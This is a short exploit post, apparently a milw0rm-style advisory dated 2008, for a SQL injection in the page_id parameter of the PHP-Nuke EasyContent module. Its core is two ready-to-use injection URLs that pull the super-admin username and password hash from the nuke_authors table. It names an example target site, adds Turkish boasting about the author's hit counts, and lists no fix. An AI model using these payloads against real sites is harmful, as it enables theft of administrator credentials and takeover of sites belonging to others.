PHP-Nuke Module EasyContent (page_id) SQL Injection Vulnerability

2008-02-19 00:00:00

-------------------------------------------------------------------------------
php-nuke modules EasyContent remote sql inj
-------------------------------------------------------------------------------
found =xoron
-------------------------------------------------------------------------------
modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/**/union/**/select/**/0,aid/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/**/union/**/select/**/0,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
-------------------------------------------------------------------------------
Example: http://eurowards.org/content/

not: password and username in title! colomb number 1

not2: Adam gibi bug bulunda dolanın ortalarda, istenilince ne kadar boş bug varsa böle post edilir milw0rma.
işe yarar bug nasıl hit yapıyor görmek istiyorsanız

http://www.milw0rm.com/author/721

sadece bi bug 16000+ hit sadece milw0rm;)

Herzmn kral benimdir!
-------------------------------------------------------------------------------

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.